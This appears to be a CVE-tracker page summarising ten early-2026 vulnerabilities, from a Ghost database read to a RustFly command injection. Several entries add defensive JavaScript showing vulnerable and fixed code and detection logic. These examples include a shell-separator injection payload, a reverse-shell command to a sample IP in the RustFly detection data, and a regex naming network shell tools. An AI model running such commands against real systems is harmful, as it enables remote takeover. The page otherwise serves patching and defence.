
Overview

  • TryGhost
  • Ghost

Published: 20 Feb 2026
Updated: 20 Feb 2026
CVSS v3.1: CRITICAL (9.4)
EPSS: 0.07%

KEV

Description

Ghost is a Node.js content management system. Versions 3.24.0 through 6.19.0 allow unauthenticated attackers to perform arbitrary reads from the database. This issue has been fixed in version 6.19.1.

Statistics

  • 1 Post

Last activity: 23 hours ago

Bluesky

📌 CVE-2026-26980 - Ghost is a Node.js content management system. Versions 3.24.0 through 6.19.0 allow unauthenticated attackers to perform arbitrary reads from the datab... https://www.cyberhub.blog/cves/CVE-2026-26980

Overview

  • JonathanWilbur
  • asn1-ts

Published: 21 Feb 2026
Updated: 21 Feb 2026
CVSS v4.0: CRITICAL (9.2)
EPSS: 0.04%

KEV

Description

asn1-ts is an ASN.1 TypeScript ESM library, including codecs for Basic Encoding Rules (BER) and Distinguished Encoding Rules (DER). In versions 11.0.5 and below, in some cases, decoding an INTEGER could leak the underlying ArrayBuffer, so a caller holding the decoded value can reach bytes of the input that were never part of that INTEGER. This issue is expected to be fixed in version 11.0.6.
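The failure mode above is a general one for JavaScript decoders: a TypedArray returned by `subarray()` is a view, and its `.buffer` property is the entire backing ArrayBuffer of the input. The block below is an added example, not asn1-ts code; it uses a deliberately minimal, assumed decoder shape (short-form lengths only) to show the leaky pattern next to the copying fix.

```javascript
// Added example (not asn1-ts code): how a BER/DER INTEGER decoder can hand
// the caller a view whose .buffer is the whole input, and the copying fix.
// The decoder is an assumed, minimal shape that handles short-form lengths.

// Constructed input: a DER INTEGER (tag 0x02, length 2, value 0x012c = 300)
// followed by bytes that happen to share the same ArrayBuffer, standing in
// for whatever else was in the caller's buffer (a key, another message).
function buildSample() {
  const integer = [0x02, 0x02, 0x01, 0x2c];
  const adjacentSecret = Array.from(Buffer.from('hunter2', 'utf8'));
  return new Uint8Array([...integer, ...adjacentSecret]);
}

function readShortLength(bytes) {
  if (bytes[0] !== 0x02) throw new Error('not an INTEGER');
  const len = bytes[1];
  if (len & 0x80) throw new Error('long-form length not handled in this example');
  if (2 + len > bytes.length) throw new Error('truncated INTEGER');
  return len;
}

// Leaky pattern: subarray() is a view. Anything holding the result can reach
// every byte of the original ArrayBuffer through .buffer.
function decodeIntegerLeaky(bytes) {
  const len = readShortLength(bytes);
  return bytes.subarray(2, 2 + len);
}

// Fixed pattern: construct a fresh Uint8Array from the view, which copies.
// (Not Buffer#slice: on Node Buffers that is also a view.)
function decodeIntegerCopy(bytes) {
  const len = readShortLength(bytes);
  return new Uint8Array(bytes.subarray(2, 2 + len));
}

// Number of bytes reachable from the returned value via .buffer.
function reachableBytes(view) {
  return view.buffer.byteLength;
}

function toBigEndianUnsigned(view) {
  return view.reduce((acc, b) => acc * 256 + b, 0);
}

function demo() {
  const input = buildSample();
  const leaky = decodeIntegerLeaky(input);
  const copied = decodeIntegerCopy(input);
  return {
    leakyValue: toBigEndianUnsigned(leaky),       // 300
    copiedValue: toBigEndianUnsigned(copied),     // 300
    leakyReach: reachableBytes(leaky),            // 11: INTEGER plus the secret
    copiedReach: reachableBytes(copied),          // 2: the value bytes only
    // What a downstream consumer of the "value" can read from the leaky result:
    leakedText: Buffer.from(leaky.buffer, 4).toString('utf8'),   // 'hunter2'
  };
}
```

Both decoders return the same integer; only the copying one stops the value from carrying the rest of the caller's buffer with it. When auditing a codec, look for `subarray`, `Buffer#slice` and `new DataView(x.buffer, ...)` on results that escape to callers.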

Statistics

  • 1 Post

Last activity: 11 hours ago

Fediverse


🛡️ CRITICAL: CVE-2026-27452 in JonathanWilbur asn1-ts (<=11.0.5) — Decoding INTEGERs may leak ArrayBuffer, exposing sensitive data. Upgrade to 11.0.6 urgently. Details: radar.offseq.com/threat/cve-20


Overview

  • pnggroup
  • libpng

Published: 10 Feb 2026
Updated: 11 Feb 2026
CVSS v4.0: HIGH (8.3)
EPSS: 0.06%

KEV

Description

LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to 1.6.55, an out-of-bounds read vulnerability exists in the png_set_quantize() API function. When the function is called with no histogram and the number of colors in the palette is more than twice the maximum supported by the user's display, certain palettes will cause the function to enter into an infinite loop that reads past the end of an internal heap-allocated buffer. The images that trigger this vulnerability are valid per the PNG specification. This vulnerability is fixed in 1.6.55.

Statistics

  • 1 Post

Last activity: 6 hours ago

Bluesky

🚨 Urgent: #Fedora 42/43 mingw-libpng update addresses CVE-2026-25646—a critical heap overflow in png_set_quantize. If you cross-compile Windows apps, patch now to avoid shipping vulnerable binaries. Read more: 👉 tinyurl.com/377ctus3 #Security

Overview

  • Pending

Published: 19 Feb 2026
Updated: 19 Feb 2026
CVSS: Pending
EPSS: 0.02%

KEV

Description

A user enumeration vulnerability exists in FormaLMS 4.1.18 and below in the password recovery functionality accessible via the /lostpwd endpoint. The application returns different error messages for valid and invalid usernames, allowing an unauthenticated attacker to determine which usernames are registered in the system through the observable response discrepancy.
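The pattern is easy to reproduce and easy to test for. The block below is an added example, not FormaLMS code: a hypothetical recovery handler in its vulnerable and fixed shapes, plus the differential check a tester would run (call once with a known-valid and once with a known-invalid username and compare everything the client can observe). The user store, handler signatures and messages are assumptions.

```javascript
// Added example, not FormaLMS code: the response-discrepancy pattern the
// description attributes to /lostpwd, its uniform-response fix, and a
// differential check that detects the oracle.
const USERS = new Set(['alice', 'bob']);   // constructed sample accounts

// Vulnerable shape: the body differs depending on whether the username exists.
function lostPasswordVulnerable(username, sendMail) {
  if (!USERS.has(username)) {
    return { status: 200, body: 'Username not found' };
  }
  sendMail(username);
  return { status: 200, body: 'A recovery email has been sent' };
}

// Fixed shape: identical status and body for both cases. Only the side
// effect (sending mail) depends on existence, and that is not visible in
// the HTTP response.
function lostPasswordFixed(username, sendMail) {
  if (USERS.has(username)) sendMail(username);
  return {
    status: 200,
    body: 'If an account with that username exists, a recovery email has been sent',
  };
}

// Everything the client can observe. Timing is a further channel that this
// check does not model; a fixed handler should also do constant work.
function observable(res) {
  return JSON.stringify({ status: res.status, body: res.body, length: res.body.length });
}

// Differential check: any difference between the two responses is an
// enumeration oracle.
function hasEnumerationOracle(handler) {
  const noMail = () => {};
  const valid = handler('alice', noMail);
  const invalid = handler('definitely-not-a-user', noMail);
  return observable(valid) !== observable(invalid);
}
```

Run `hasEnumerationOracle` against each handler: it reports `true` for the vulnerable shape and `false` for the fixed one. Against a live target the same comparison is done on the raw HTTP responses, including headers, redirect targets and response time.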

Statistics

  • 1 Post

Last activity: 19 hours ago

Bluesky

CVE-2026-26744: How a Small Bug Bump Can Lead to Big Security Wins + Video Introduction: In the world of cybersecurity, not every vulnerability leads to a system-wide compromise or makes headlines. However, the discovery and disclosure of even minor flaws are the bedrock of a resilient digital…

Overview

  • getsentry
  • sentry

Published: 21 Feb 2026
Updated: 21 Feb 2026
CVSS v3.1: CRITICAL (9.1)
EPSS: 0.04%

KEV

Description

Sentry is a developer-first error tracking and performance monitoring tool. Versions 21.12.0 through 26.1.0 have a critical vulnerability in the SAML SSO implementation which allows an attacker to take over any user account by using a malicious SAML Identity Provider and another organization on the same Sentry instance. Self-hosted users are only at risk if one of the following criteria is met: more than one organization is configured (that is, the instance is not running in single-organization mode, SENTRY_SINGLE_ORGANIZATION = False), or a malicious user has existing access and permissions to modify SSO settings for another organization in a multi-organization instance. This issue has been fixed in version 26.2.0. To work around this issue, enable account-based two-factor authentication, which prevents an attacker from completing authentication with a victim's user account. Organization administrators cannot do this on a user's behalf; individual users must ensure 2FA is enabled for their own account.
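The description gives the effect (an IdP controlled by the attacker and attached to a different organization on the same instance can authenticate as any user) but not the code path. The block below is an added example, not Sentry code, and models the general failure class that produces that effect: resolving a signature-verified assertion's NameID/email to any user on the instance, instead of to an identity already bound to the organization's own provider. Users, providers and identity links are constructed; the function and field names are hypothetical.

```javascript
// Added example, not Sentry code: a model of "malicious IdP in another org
// logs in as any user", with the vulnerable and fixed user-resolution steps.
const users = [
  { id: 1, email: 'victim@example.com' },
  { id: 2, email: 'mallory@evil.example' },
];
// Each SAML provider is configured for exactly one organization.
const providers = {
  'acme-idp': { org: 'acme' },
  'evil-idp': { org: 'evilcorp' },   // Mallory runs this IdP
};
// Links created by earlier, legitimate SSO logins: (provider, ident) -> user.
const authIdentities = [
  { provider: 'acme-idp', ident: 'victim@example.com', userId: 1 },
];

// An assertion that has already passed signature verification against the
// named provider's certificate. Whoever controls the IdP chooses nameId, so
// signature validity says nothing about whether this IdP may speak for
// the asserted user.
function verifiedAssertion(provider, nameId) {
  return { provider, nameId };
}

// Vulnerable shape: the asserted email is used as an instance-wide key.
function resolveUserVulnerable(assertion) {
  return users.find(u => u.email === assertion.nameId) || null;
}

// Fixed shape: the provider must be the one configured for the organization
// this login started for, and the (provider, nameId) pair must already be
// linked to a user. No link means "unknown identity", never "match by email".
function resolveUserFixed(assertion, loginOrg) {
  const provider = providers[assertion.provider];
  if (!provider || provider.org !== loginOrg) return null;
  const link = authIdentities.find(
    l => l.provider === assertion.provider && l.ident === assertion.nameId);
  return link ? (users.find(u => u.id === link.userId) || null) : null;
}
```

With `verifiedAssertion('evil-idp', 'victim@example.com')` the vulnerable resolver returns the victim, while the fixed resolver returns null for any organization. The fixed shape also implies that first-time linking of a (provider, NameID) pair to an existing account must require proof from that account (for example, the user linking it while already logged in), and that per-user 2FA remains an independent control, which is why the advisory offers it as the workaround.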

Statistics

  • 1 Post

Last activity: 13 hours ago

Fediverse


🚨 Critical SAML SSO vuln (CVE-2026-27197, CVSS 9.1) in Sentry 21.12.0 – 26.1.0 allows remote account takeover in multi-org instances. Upgrade to 26.2.0+, enable user 2FA, audit SSO settings! Full details: radar.offseq.com/threat/cve-20


Overview

  • GetSimpleCMS-CE
  • GetSimpleCMS-CE

Published: 20 Feb 2026
Updated: 20 Feb 2026
CVSS v4.0: HIGH (7.1)
EPSS: 0.02%

KEV

Description

GetSimple CMS is a content management system. All versions of GetSimple CMS do not implement CSRF protection on the administrative file upload endpoint. As a result, an attacker can craft a malicious web page that silently triggers a file upload request from an authenticated victim’s browser. The request is accepted without requiring a CSRF token or origin validation. This allows an attacker to upload arbitrary files to the application without the victim’s knowledge or consent. In order to exploit this vulnerability, the victim must be authenticated to GetSimple CMS (e.g., admin user), and visit an attacker-controlled webpage. This issue does not have a fix at the time of publication.
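The description names the two missing checks: a CSRF token and origin validation. The block below is an added example, not GetSimple CMS code; it applies both checks to a hypothetical request object of shape `{method, headers, fields}` and shows three constructed requests: the one the victim's browser sends when an attacker's page auto-submits an upload form, a legitimate upload from the admin UI, and a same-origin request carrying a stale token. `SITE_ORIGIN`, the field name `csrf_token` and the token value are assumptions.

```javascript
// Added example, not GetSimple CMS code: server-side CSRF checks for a
// file-upload endpoint (Origin/Referer validation plus a session-bound token).
const SITE_ORIGIN = 'https://cms.example';   // assumed deployment origin

function constantTimeEqual(a, b) {
  if (a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// Returns null when the request may proceed, otherwise the reason it must be
// rejected. Fails closed when neither Origin nor Referer is present.
function csrfRejectReason(req, sessionToken) {
  if (req.method !== 'POST') return 'method';
  const origin = req.headers.origin;
  const referer = req.headers.referer;
  if (origin !== undefined) {
    // Browsers set Origin on cross-site POSTs; a script cannot forge it.
    if (origin !== SITE_ORIGIN) return 'origin';
  } else if (referer !== undefined) {
    let refOrigin;
    try { refOrigin = new URL(referer).origin; } catch (e) { return 'referer'; }
    if (refOrigin !== SITE_ORIGIN) return 'referer';
  } else {
    return 'no-origin';
  }
  // The token lives in the form body, which only a same-origin page can
  // have read; the attacker's page cannot include it.
  const token = req.fields.csrf_token;
  if (typeof token !== 'string' || !constantTimeEqual(token, sessionToken)) return 'token';
  return null;
}

// Constructed requests. The victim's browser attaches the session cookie to
// all of them; what differs is the Origin the browser sets and whether the
// page that built the form could know the session's token.
const SESSION_TOKEN = '3f9a0c7d1e';
const fromAttackerPage = {
  method: 'POST',
  headers: { origin: 'https://attacker.example', cookie: 'session=...' },
  fields: { file: 'payload.php' },           // no token: attacker cannot read it
};
const fromAdminPage = {
  method: 'POST',
  headers: { origin: SITE_ORIGIN, cookie: 'session=...' },
  fields: { file: 'logo.png', csrf_token: SESSION_TOKEN },
};
const sameOriginStaleToken = {
  method: 'POST',
  headers: { referer: SITE_ORIGIN + '/admin/upload.php', cookie: 'session=...' },
  fields: { file: 'logo.png', csrf_token: 'deadbeef' },
};
```

The attacker's request is rejected on Origin before the token is even looked at; the stale-token request passes the origin check and fails on the token. `SameSite=Lax` session cookies reduce exposure to this class of attack, but the token plus origin check is the fix the advisory's wording describes, and it does not depend on browser cookie policy.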

Statistics

  • 1 Post

Last activity: 6 hours ago

Bluesky

How I found CVE-2026-27146 (CSRF) | Cyber Tamarin https://cybertamarin.medium.com/how-i-found-cve-2026-27146-cyber-tamarin-a2886542db22?source=rss------bug_bounty-5

Overview

  • frappe
  • erpnext

Published: 21 Feb 2026
Updated: 21 Feb 2026
CVSS v4.0: CRITICAL (9.3)
EPSS: 0.04%

KEV

Description

ERPNext is a free and open source Enterprise Resource Planning tool. In versions up to and including 15.98.0, and from 16.0.0-rc.1 through 16.6.0, certain endpoints lacked access validation, which allowed unauthorized document access. This issue has been fixed in versions 15.98.1 and 16.6.1.

Statistics

  • 1 Post

Last activity: 10 hours ago

Fediverse


🚨 CRITICAL: CVE-2026-27471 in ERPNext (≤15.98.0, 16.0.0-rc.1 – 16.6.0) lets unauth attackers access sensitive docs via missing API auth. Upgrade to 15.98.1/16.6.1+ & restrict access now. radar.offseq.com/threat/cve-20


Overview

  • Red Hat
  • Red Hat Enterprise Linux 10
  • gnutls

Published: 09 Feb 2026
Updated: 18 Feb 2026
CVSS: Pending
EPSS: 0.04%

KEV

Description

A flaw was found in GnuTLS. This vulnerability allows a denial of service (DoS) by excessive CPU (Central Processing Unit) and memory consumption via specially crafted malicious certificates containing a large number of name constraints and subject alternative names (SANs).
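Why "many name constraints and many SANs" costs so much: every SAN has to be checked against every permitted and excluded subtree, so the work grows as the product of the two counts, and a single crafted chain can force a verifier through millions of comparisons before it reaches a verdict. The block below is an added example, not GnuTLS code; it models only dNSName constraints with RFC 5280 suffix matching, counts the comparisons a naive checker performs, and shows the work-budget cut-off a verifier can apply up front. The certificate fields are constructed.

```javascript
// Added example, not GnuTLS code: quadratic cost of name-constraint checking
// and a work budget that bounds it. Only dNSName subtrees are modelled.

// RFC 5280 4.2.1.10 suffix match: "example.com" matches itself and any
// host under it at a label boundary; ".example.com" matches only subdomains.
function dnsMatchesSubtree(name, subtree) {
  const n = name.toLowerCase();
  const s = subtree.toLowerCase();
  if (s === '' || n === s) return true;
  if (!n.endsWith(s)) return false;
  return s.startsWith('.') || n[n.length - s.length - 1] === '.';
}

// Naive check: every SAN against every excluded subtree, then against the
// permitted subtrees. Returns the verdict and the number of comparisons;
// that number grows as sans.length * (excluded.length + permitted.length).
function checkNameConstraints(sans, permitted, excluded, budget = Infinity) {
  let comparisons = 0;
  for (const san of sans) {
    for (const ex of excluded) {
      if (++comparisons > budget) return { ok: false, reason: 'budget', comparisons };
      if (dnsMatchesSubtree(san, ex)) return { ok: false, reason: 'excluded', comparisons };
    }
    if (permitted.length > 0) {
      let allowed = false;
      for (const p of permitted) {
        if (++comparisons > budget) return { ok: false, reason: 'budget', comparisons };
        if (dnsMatchesSubtree(san, p)) { allowed = true; break; }
      }
      if (!allowed) return { ok: false, reason: 'not-permitted', comparisons };
    }
  }
  return { ok: true, reason: null, comparisons };
}

// Constructed worst case: N SANs that never match any of N excluded subtrees,
// so the checker does N*N comparisons before it can accept the chain.
function hostileCert(n) {
  const sans = Array.from({ length: n }, (_, i) => `h${i}.example`);
  const excluded = Array.from({ length: n }, (_, i) => `x${i}.example`);
  return { sans, excluded, permitted: [] };
}

// Cheap pre-check a verifier can run before doing any matching at all.
function withinBudget(cert, budget) {
  return cert.sans.length * (cert.excluded.length + cert.permitted.length) <= budget;
}
```

`hostileCert(200)` already costs 40,000 comparisons for a chain with nothing wrong in it; at the sizes a crafted certificate can carry that becomes the CPU and memory exhaustion the description refers to. Both `withinBudget` and the `budget` argument turn that into a fast rejection of the chain, which is the behaviour a hardened verifier wants.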

Statistics

  • 1 Post

Last activity: 7 hours ago

Bluesky

#Mageia 2026-0045 addresses a high-severity GnuTLS flaw (CVE-2025-14831). This isn't just a patch; it's a compliance and operational necessity. Read more: 👉 tinyurl.com/266b8u85 #Security

Overview

  • sebhildebrandt
  • systeminformation

Published: 19 Feb 2026
Updated: 19 Feb 2026
CVSS v3.1: HIGH (8.4)
EPSS: 0.06%

KEV

Description

systeminformation is a System and OS information library for node.js. In versions prior to 5.30.8, a command injection vulnerability in the `wifiNetworks()` function allows an attacker to execute arbitrary OS commands via an unsanitized network interface parameter in the retry code path. In `lib/wifi.js`, the `wifiNetworks()` function sanitizes the `iface` parameter on the initial call (line 437). However, when the initial scan returns empty results, a `setTimeout` retry (lines 440-441) calls `getWifiNetworkListIw(iface)` with the **original unsanitized** `iface` value, which is passed directly to `execSync('iwlist ${iface} scan')`. Any application passing user-controlled input to `si.wifiNetworks()` is vulnerable to arbitrary command execution with the privileges of the Node.js process. Version 5.30.8 fixes the issue.
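The description lays out the bug precisely: the first scan uses the sanitized value, the retry closes over the original parameter. The block below is an added example, not the systeminformation code, that reproduces that two-path shape with a recording stand-in for `execSync` so it runs offline and shows exactly which command line each variant would hand to the shell. The `sanitize()` allowlist, the synchronous retry (the library used a `setTimeout`) and the payload are assumptions made for the example.

```javascript
// Added example, not systeminformation code: the sanitized-first-call /
// raw-retry bug and its fix, with a fake exec that records command lines.
function sanitize(iface) {
  // Allowlist of characters that can appear in an interface name.
  return String(iface).replace(/[^A-Za-z0-9_.:-]/g, '');
}

// Stand-in for execSync: records the exact string the shell would receive
// and returns '' so the empty-result retry path is always taken.
function recordingExec(log) {
  return cmd => { log.push(cmd); return ''; };
}

// Vulnerable shape: `clean` is used once, then the retry closes over the
// original `iface`.
function wifiNetworksVulnerable(iface, exec) {
  const clean = sanitize(iface);
  let out = exec(`iwlist ${clean} scan`);
  if (out === '') {
    out = exec(`iwlist ${iface} scan`);   // BUG: raw parameter reaches the shell
  }
  return out;
}

// Fixed shape: sanitize once and shadow the parameter, so the raw value is
// not reachable from any later code path in the function.
function wifiNetworksFixed(iface, exec) {
  iface = sanitize(iface);
  let out = exec(`iwlist ${iface} scan`);
  if (out === '') {
    out = exec(`iwlist ${iface} scan`);
  }
  return out;
}

// Returns the command lines a variant would hand to the shell, in order.
function commandLinesFor(variant, iface) {
  const log = [];
  variant(iface, recordingExec(log));
  return log;
}

// Constructed attacker input: an interface name carrying a shell separator.
const PAYLOAD = 'wlan0; id';
```

For `PAYLOAD` the vulnerable variant records `iwlist wlan0id scan` and then `iwlist wlan0; id scan`; the fixed variant records `iwlist wlan0id scan` twice. The stronger fix is to avoid the shell entirely, for example `execFile('iwlist', [iface, 'scan'])`, so that no interpolation into a command string exists to get wrong on any code path.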

Statistics

  • 1 Post

Last activity: 15 hours ago

Bluesky

📌 CVE-2026-26280 - systeminformation is a System and OS information library for node.js. In versions prior to 5.30.8, a command injection vulnerability in the `wifiNetwo... https://www.cyberhub.blog/cves/CVE-2026-26280

Overview

  • Bixat
  • RustFly

Published: 19 Feb 2026
Updated: 20 Feb 2026
CVSS v4.0: CRITICAL (9.3)
EPSS: 0.27%

KEV

Description

RustFly 2.0.0 contains a command injection vulnerability in its remote UI control mechanism that accepts hex-encoded instructions over UDP port 5005 without proper sanitization. Attackers can send crafted hex-encoded payloads containing system commands to execute arbitrary operations on the target system, including reverse shell establishment and command execution.
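The description gives enough to write a detection: instructions arrive hex-encoded over UDP/5005 and are handed to the system without sanitization. The block below is an added example, not RustFly code; it hex-decodes each datagram to that port and flags decoded text carrying shell metacharacters or reverse-shell idioms. The sample datagrams, the benign "click" instruction and the regular expression are constructed; the real protocol framing is not documented on this page, so tune the pattern against captured legitimate traffic before alerting on it.

```javascript
// Added example, not RustFly code: a detection pass over UDP datagrams to
// port 5005, based on the description's "hex-encoded instructions".
function decodeHexPayload(hex) {
  const s = String(hex).trim();
  if (s.length === 0 || s.length % 2 !== 0 || /[^0-9a-fA-F]/.test(s)) return null;
  return Buffer.from(s, 'hex').toString('utf8');
}

// Shell separators and substitution, plus common reverse-shell markers.
const SUSPICIOUS = /[;&|`$<>]|\$\(|\/bin\/(?:ba)?sh|\/dev\/tcp\/|\bnc\b|\bncat\b|\bcurl\b|\bwget\b/;

function classifyDatagram(d) {
  if (d.dport !== 5005) return 'other-port';
  const text = decodeHexPayload(d.payloadHex);
  if (text === null) return 'undecodable';
  return SUSPICIOUS.test(text) ? 'suspicious' : 'benign';
}

function hexOf(text) {
  return Buffer.from(text, 'utf8').toString('hex');
}

// Constructed sample traffic: a plausible benign instruction, a malformed
// payload, a reverse-shell attempt, and the same kind of payload on another port.
const SAMPLES = [
  { src: '10.0.0.5', dport: 5005, payloadHex: hexOf('click 100 200') },
  { src: '10.0.0.7', dport: 5005, payloadHex: 'zz-not-hex' },
  { src: '203.0.113.9', dport: 5005, payloadHex: hexOf('bash -i >& /dev/tcp/203.0.113.9/4444 0>&1') },
  { src: '203.0.113.9', dport: 5006, payloadHex: hexOf('; id') },
];

// Distinct source addresses that sent a suspicious instruction to 5005.
function suspiciousSources(datagrams) {
  return [...new Set(
    datagrams.filter(d => classifyDatagram(d) === 'suspicious').map(d => d.src))];
}
```

On the sample traffic only `203.0.113.9` is reported. Decoding before matching matters: a signature written against the raw hex would miss trivial re-encodings (upper versus lower case digits, added whitespace), while the decoded text is what the target actually executes.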

Statistics

  • 1 Post

Last activity: 5 hours ago

Bluesky

📌 CVE-2026-27476 - RustFly 2.0.0 contains a command injection vulnerability in its remote UI control mechanism that accepts hex-encoded instructions over UDP port 5005 w... https://www.cyberhub.blog/cves/CVE-2026-27476